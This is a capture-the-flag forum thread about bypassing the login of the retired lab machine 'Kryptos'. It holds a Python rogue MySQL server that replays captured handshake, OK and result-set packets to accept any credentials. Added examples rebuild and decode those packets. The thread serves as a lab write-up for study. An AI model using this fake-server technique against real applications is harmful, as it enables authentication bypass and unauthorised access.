Use the script as a particular MySQL server to bypass Kryptos login

edited September 2019 in Exploits

Kryptos retired and I didn't get user; I was stuck at the encrypt part.
Thanks to @limbernie & @n1b1ru for their help. I asked, and both of you responded, but I couldn't solve it eventually. Well, I'm C136Rick, not @0xRick (you know what I mean) :p.
And thanks to @no0ne & @Adamm for making it, I like it.

Here is what I did. I just copied the MySQL responses into the program after analyzing captured MySQL network data with Wireshark. When that request's parameter (db) was set and the request sent in Burp, I ran the program and got a 302, which means it worked.

import socket
import logging

logging.basicConfig(level=logging.DEBUG)

# Replays the server side of a captured MySQL session. Every packet is a 3-byte
# little-endian length, a 1-byte sequence id, then the payload. The literals are
# bytes (b"...") so the script runs under Python 3 as well as Python 2.
if __name__ == '__main__':

    sock = socket.socket()
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(("0.0.0.0", 3306))
    sock.listen(5)

    con, addr = sock.accept()

    logging.info('Connect from: %r', addr)
    # Wireshark Info: Server Greeting proto=10 version=5.5.53
    # Length 0x4a (74), seq 0: protocol 10, "5.5.53\0", thread id 0x17, 8-byte salt
    # "nz;Tvsaj", capability flags 0xf7ff, charset 0x21, status 0x0002, capability
    # flags 0x800f, auth data length 0x15, 10 reserved bytes, 12-byte salt
    # "pv!=P\Z2*zI?" and the plugin name "mysql_native_password".
    con.sendall(b"\x4a\x00\x00\x00\x0a\x35\x2e\x35\x2e\x35\x33\x00\x17\x00\x00\x00\x6e\x7a\x3b\x54\x76\x73\x61\x6a\x00\xff\xf7\x21\x02\x00\x0f\x80\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x76\x21\x3d\x50\x5c\x5a\x32\x2a\x7a\x49\x3f\x00\x6d\x79\x73\x71\x6c\x5f\x6e\x61\x74\x69\x76\x65\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x00")
    con.recv(2048)

    logging.info("Wireshark Info: Login Request user=dbuser db=cryptor")
    # Wireshark Info: Response OK
    # Length 7, seq 2: header 0x00, 0 affected rows, 0 last insert id, status
    # 0x0002 (autocommit), 0 warnings. Whatever credentials arrive are accepted.
    con.sendall(b"\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00")
    con.recv(2048)

    logging.info("Wireshark Info: Request Query")
    # Wireshark Info: Response.
    # Seq 1: column count 2. Seq 2 and 3: column definitions for
    # cryptor.users.username and cryptor.users.password (VAR_STRING, charset 0x21,
    # length 150). Seq 4: EOF. Seq 5: one row "dbuser", "dbuser". Seq 6: EOF.
    # Returned for whatever query the client sent.
    con.sendall(b"\x01\x00\x00\x01\x02\x37\x00\x00\x02\x03\x64\x65\x66\x07\x63\x72\x79\x70\x74\x6f\x72\x05\x75\x73\x65\x72\x73\x05\x75\x73\x65\x72\x73\x08\x75\x73\x65\x72\x6e\x61\x6d\x65\x08\x75\x73\x65\x72\x6e\x61\x6d\x65\x0c\x21\x00\x96\x00\x00\x00\xfd\x01\x10\x00\x00\x00\x37\x00\x00\x03\x03\x64\x65\x66\x07\x63\x72\x79\x70\x74\x6f\x72\x05\x75\x73\x65\x72\x73\x05\x75\x73\x65\x72\x73\x08\x70\x61\x73\x73\x77\x6f\x72\x64\x08\x70\x61\x73\x73\x77\x6f\x72\x64\x0c\x21\x00\x96\x00\x00\x00\xfd\x01\x10\x00\x00\x00\x05\x00\x00\x04\xfe\x00\x00\x22\x00\x0e\x00\x00\x05\x06\x64\x62\x75\x73\x65\x72\x06\x64\x62\x75\x73\x65\x72\x05\x00\x00\x06\xfe\x00\x00\x22\x00")
    con.recv(2048)

    logging.info("Wireshark Info: Request Quit")
    logging.info("done!")
    con.close()
    sock.close()
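The script above replays bytes lifted from a capture, so changing the table, the column names or the row it returns means re-capturing. The following is an added example, not code from the original post: the same exchange built from small packet constructors for the MySQL client/server protocol (HandshakeV10 greeting, OK packet, EOF packet, ColumnDefinition41 and a text result set). The server version 5.5.53, connection id 0x17, the 20-byte salt, charset 33, capability flags 0xf7ff/0x800f and the VAR_STRING(150) column definitions are the values from the post's capture; the listen address and the one-client `serve_once` loop are assumptions. Called with exactly those values, the constructors reproduce the three byte strings the script sends, byte for byte.

```python
import socket
import struct

# Values taken from the capture in the post; the listen address is an assumption.
SERVER_VERSION = "5.5.53"
THREAD_ID = 0x17
SALT = b"nz;Tvsajpv!=P\\Z2*zI?"        # 8-byte part 1 + 12-byte part 2 = 20 bytes
LISTEN = ("0.0.0.0", 3306)


def packet(seq: int, payload: bytes) -> bytes:
    """MySQL packet framing: 3-byte little-endian payload length + 1-byte sequence id."""
    return len(payload).to_bytes(3, "little") + bytes([seq & 0xFF]) + payload


def lenenc_str(s: str) -> bytes:
    """Length-encoded string. Every string in this exchange is shorter than 251
    bytes, so the single-byte length form is enough."""
    data = s.encode()
    if len(data) >= 251:
        raise ValueError("string too long for a single-byte length prefix")
    return bytes([len(data)]) + data


def handshake_v10(version: str, thread_id: int, salt: bytes, seq: int = 0) -> bytes:
    """Protocol::HandshakeV10, the 'Server Greeting' Wireshark shows. Capability
    flags, charset and status are the literal values from the capture."""
    if len(salt) != 20:
        raise ValueError("mysql_native_password needs a 20-byte salt")
    payload = (
        b"\x0a"                          # protocol version 10
        + version.encode() + b"\x00"     # server version, NUL-terminated
        + struct.pack("<I", thread_id)   # connection id
        + salt[:8] + b"\x00"             # auth-plugin-data part 1 + filler
        + b"\xff\xf7"                    # capability flags, lower 16 bits
        + b"\x21"                        # character set 33 (utf8_general_ci)
        + b"\x02\x00"                    # status flags: SERVER_STATUS_AUTOCOMMIT
        + b"\x0f\x80"                    # capability flags, upper 16 bits
        + b"\x15"                        # auth-plugin-data length (20 + NUL)
        + b"\x00" * 10                   # reserved
        + salt[8:] + b"\x00"             # auth-plugin-data part 2 + NUL
        + b"mysql_native_password\x00"   # auth plugin name
    )
    return packet(seq, payload)


def ok_packet(seq: int) -> bytes:
    """OK_Packet: header 0x00, affected rows 0, last insert id 0, status
    SERVER_STATUS_AUTOCOMMIT, 0 warnings. Sent for any HandshakeResponse."""
    return packet(seq, b"\x00\x00\x00\x02\x00\x00\x00")


def eof_packet(seq: int, status: int = 0x0022) -> bytes:
    """EOF_Packet: 0xfe, warning count 0, status flags (0x0022 as captured)."""
    return packet(seq, b"\xfe\x00\x00" + struct.pack("<H", status))


def column_def(seq: int, schema: str, table: str, name: str) -> bytes:
    """ColumnDefinition41 for a VAR_STRING(150) column in charset 33 with flags
    0x1001 (NOT_NULL | NO_DEFAULT_VALUE), exactly as the captured definitions."""
    payload = (
        lenenc_str("def") + lenenc_str(schema)
        + lenenc_str(table) + lenenc_str(table)    # table, org_table
        + lenenc_str(name) + lenenc_str(name)      # name, org_name
        + b"\x0c"                                  # length of the fixed-size fields
        + b"\x21\x00"                              # character set
        + struct.pack("<I", 150)                   # column length
        + b"\xfd"                                  # MYSQL_TYPE_VAR_STRING
        + b"\x01\x10"                              # flags 0x1001
        + b"\x00"                                  # decimals
        + b"\x00\x00"                              # filler
    )
    return packet(seq, payload)


def text_resultset(schema: str, table: str, columns: list, rows: list) -> bytes:
    """Text-protocol result set: column count, one definition per column, EOF,
    one packet per row, EOF. Sequence ids start at 1 (the COM_QUERY was seq 0)."""
    seq = 1
    out = packet(seq, bytes([len(columns)]))
    for name in columns:
        seq += 1
        out += column_def(seq, schema, table, name)
    seq += 1
    out += eof_packet(seq)
    for row in rows:
        seq += 1
        out += packet(seq, b"".join(lenenc_str(v) for v in row))
    seq += 1
    out += eof_packet(seq)
    return out


def serve_once(listen=LISTEN) -> None:
    """Accept one client and run the exchange the post's script replays: greeting,
    OK for whatever credentials arrive, one row for whatever query arrives, close."""
    greeting = handshake_v10(SERVER_VERSION, THREAD_ID, SALT)
    resultset = text_resultset("cryptor", "users", ["username", "password"],
                               [["dbuser", "dbuser"]])
    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(listen)
        srv.listen(1)
        con, _addr = srv.accept()
        with con:
            con.sendall(greeting)
            con.recv(2048)            # HandshakeResponse41 (user, db, scrambled password)
            con.sendall(ok_packet(2))
            con.recv(2048)            # COM_QUERY
            con.sendall(resultset)
            con.recv(2048)            # COM_QUIT


if __name__ == "__main__":
    serve_once()
```

The point of building rather than replaying is that the row the application gets back is whatever `text_resultset` is given, so the same server can be reused against a different query shape without opening Wireshark again; the check that the builders are right is that they reproduce the post's captured packets exactly.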

Comments

  • @C136Rick said: [quoted post above]

    ohhh

  • You can still continue to work on it even though Kryptos has retired.

    limbernie
    My write-ups of retired machines | Discord - limbernie#0386

  • edited September 2019

    @limbernie said:

    You can still continue to work on it even though Kryptos has retired.

    Knew it, and thanks for the response.

  • Nice work, I haven't done Kryptos, watched ippsec's video. Could you comment your code about the hex values?

    peek

  • @peek said:

    Nice work, I haven't done Kryptos, watched ippsec's video. Could you comment your code about the hex values?

    It's all about MySQL data.
    Here is the TCP stream from Wireshark; just ignore "username" and "password".

    J...
    5.5.53.....nz;Tvsaj...!...............pv!=P\Z2*zI?.mysql_native_password.Z...........!.......................dbuser..-!.n.>.s!#..M..?....cryptor.mysql_native_password............m....SELECT username, password FROM users WHERE username='11111' AND password='1bbd886460827015e5d605ed44252251' .....7....def.cryptor.users.users.username.username.!...........7....def.cryptor.users.users.password.password.!.................."......dbuser.dbuser......."......
    
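For the question about the hex values: the byte strings in the script are MySQL client/server protocol packets, each a 3-byte little-endian length, a 1-byte sequence id, then the payload, and the TCP stream above is the same bytes rendered as text. The decoder below is an added example, not code from the thread; it takes the three server-side byte strings from the script (copied from it verbatim and so labelled) and prints what each field means, so the capture can be read without Wireshark. It assumes every length-encoded integer fits in one byte (value below 251), which holds for all of these packets, and the `MYSQL_TYPES` table covers only the column types needed here.

```python
import struct

# The three server-side byte strings the script in the post sends, copied from it
# verbatim: HandshakeV10 greeting, OK packet, and the result set for the query.
GREETING = b"\x4a\x00\x00\x00\x0a\x35\x2e\x35\x2e\x35\x33\x00\x17\x00\x00\x00\x6e\x7a\x3b\x54\x76\x73\x61\x6a\x00\xff\xf7\x21\x02\x00\x0f\x80\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x76\x21\x3d\x50\x5c\x5a\x32\x2a\x7a\x49\x3f\x00\x6d\x79\x73\x71\x6c\x5f\x6e\x61\x74\x69\x76\x65\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x00"
OK_PACKET = b"\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00"
RESULTSET = b"\x01\x00\x00\x01\x02\x37\x00\x00\x02\x03\x64\x65\x66\x07\x63\x72\x79\x70\x74\x6f\x72\x05\x75\x73\x65\x72\x73\x05\x75\x73\x65\x72\x73\x08\x75\x73\x65\x72\x6e\x61\x6d\x65\x08\x75\x73\x65\x72\x6e\x61\x6d\x65\x0c\x21\x00\x96\x00\x00\x00\xfd\x01\x10\x00\x00\x00\x37\x00\x00\x03\x03\x64\x65\x66\x07\x63\x72\x79\x70\x74\x6f\x72\x05\x75\x73\x65\x72\x73\x05\x75\x73\x65\x72\x73\x08\x70\x61\x73\x73\x77\x6f\x72\x64\x08\x70\x61\x73\x73\x77\x6f\x72\x64\x0c\x21\x00\x96\x00\x00\x00\xfd\x01\x10\x00\x00\x00\x05\x00\x00\x04\xfe\x00\x00\x22\x00\x0e\x00\x00\x05\x06\x64\x62\x75\x73\x65\x72\x06\x64\x62\x75\x73\x65\x72\x05\x00\x00\x06\xfe\x00\x00\x22\x00"

# Only the column types this capture can contain; others are shown as hex.
MYSQL_TYPES = {0x03: "LONG", 0xfc: "BLOB", 0xfd: "VAR_STRING", 0xfe: "STRING"}


def split_packets(buf: bytes) -> list:
    """Frame the stream into (sequence id, payload) pairs using the 4-byte header."""
    packets = []
    while buf:
        length = int.from_bytes(buf[:3], "little")
        packets.append((buf[3], buf[4:4 + length]))
        buf = buf[4 + length:]
    return packets


def read_lenenc_str(payload: bytes, pos: int):
    """Length-encoded string; single-byte lengths (< 251) are assumed."""
    n = payload[pos]
    return payload[pos + 1:pos + 1 + n].decode(), pos + 1 + n


def parse_handshake(payload: bytes) -> dict:
    """Decode Protocol::HandshakeV10 (Wireshark's 'Server Greeting')."""
    end = payload.index(b"\x00", 1)
    version = payload[1:end].decode()
    pos = end + 1
    thread_id, = struct.unpack_from("<I", payload, pos); pos += 4
    salt = payload[pos:pos + 8]; pos += 9                 # part 1 + filler byte
    cap_low, charset, status, cap_high = struct.unpack_from("<HBHH", payload, pos); pos += 7
    auth_len = payload[pos]; pos += 11                    # length byte + 10 reserved bytes
    part2_len = max(13, auth_len - 8)                     # part 2 includes a trailing NUL
    salt += payload[pos:pos + part2_len].rstrip(b"\x00"); pos += part2_len
    plugin = payload[pos:payload.index(b"\x00", pos)].decode()
    return {"protocol": payload[0], "version": version, "thread_id": thread_id,
            "salt": salt, "capabilities": (cap_high << 16) | cap_low,
            "charset": charset, "status": status, "plugin": plugin}


def parse_ok(payload: bytes) -> dict:
    """OK_Packet with single-byte affected-rows and last-insert-id (both 0 here)."""
    affected, insert_id, status, warnings = struct.unpack_from("<BBHH", payload, 1)
    return {"affected_rows": affected, "last_insert_id": insert_id,
            "status": status, "warnings": warnings}


def parse_column_def(payload: bytes) -> dict:
    """ColumnDefinition41: catalog, schema, table, org_table, name, org_name as
    length-encoded strings, then the fixed-size charset/length/type/flags fields."""
    fields, pos = [], 0
    for _ in range(6):
        s, pos = read_lenenc_str(payload, pos)
        fields.append(s)
    pos += 1                                              # 0x0c: length of the fixed fields
    charset, length, ctype, flags, decimals = struct.unpack_from("<HIBHB", payload, pos)
    return {"schema": fields[1], "table": fields[2], "name": fields[4],
            "charset": charset, "length": length,
            "type": MYSQL_TYPES.get(ctype, hex(ctype)), "flags": flags, "decimals": decimals}


def parse_resultset(buf: bytes) -> dict:
    """Text result set: column count, column definitions, EOF, rows, EOF."""
    packets = split_packets(buf)
    ncols = packets[0][1][0]
    columns = [parse_column_def(p) for _, p in packets[1:1 + ncols]]
    if packets[1 + ncols][1][0] != 0xfe:
        raise ValueError("expected EOF after the column definitions")
    rows = []
    for _, p in packets[2 + ncols:]:
        if p[0] == 0xfe and len(p) < 9:                   # EOF packet ends the rows
            break
        pos, row = 0, {}
        for col in columns:
            row[col["name"]], pos = read_lenenc_str(p, pos)
        rows.append(row)
    return {"columns": columns, "rows": rows}


def describe() -> None:
    """Print the decoded meaning of the three replayed server messages."""
    print("Server Greeting:", parse_handshake(split_packets(GREETING)[0][1]))
    print("Login response:", parse_ok(split_packets(OK_PACKET)[0][1]))
    rs = parse_resultset(RESULTSET)
    print("Query response columns:",
          [(c["schema"], c["table"], c["name"], c["type"], c["length"]) for c in rs["columns"]])
    print("Query response rows:", rs["rows"])


if __name__ == "__main__":
    describe()
```

Decoded, the greeting advertises MySQL 5.5.53 with the mysql_native_password plugin and a 20-byte salt, the OK packet accepts the login regardless of what the client sent, and the query response describes two VAR_STRING columns of cryptor.users and returns the single row dbuser/dbuser, which is why the application's `SELECT ... WHERE username=... AND password=...` appears to match.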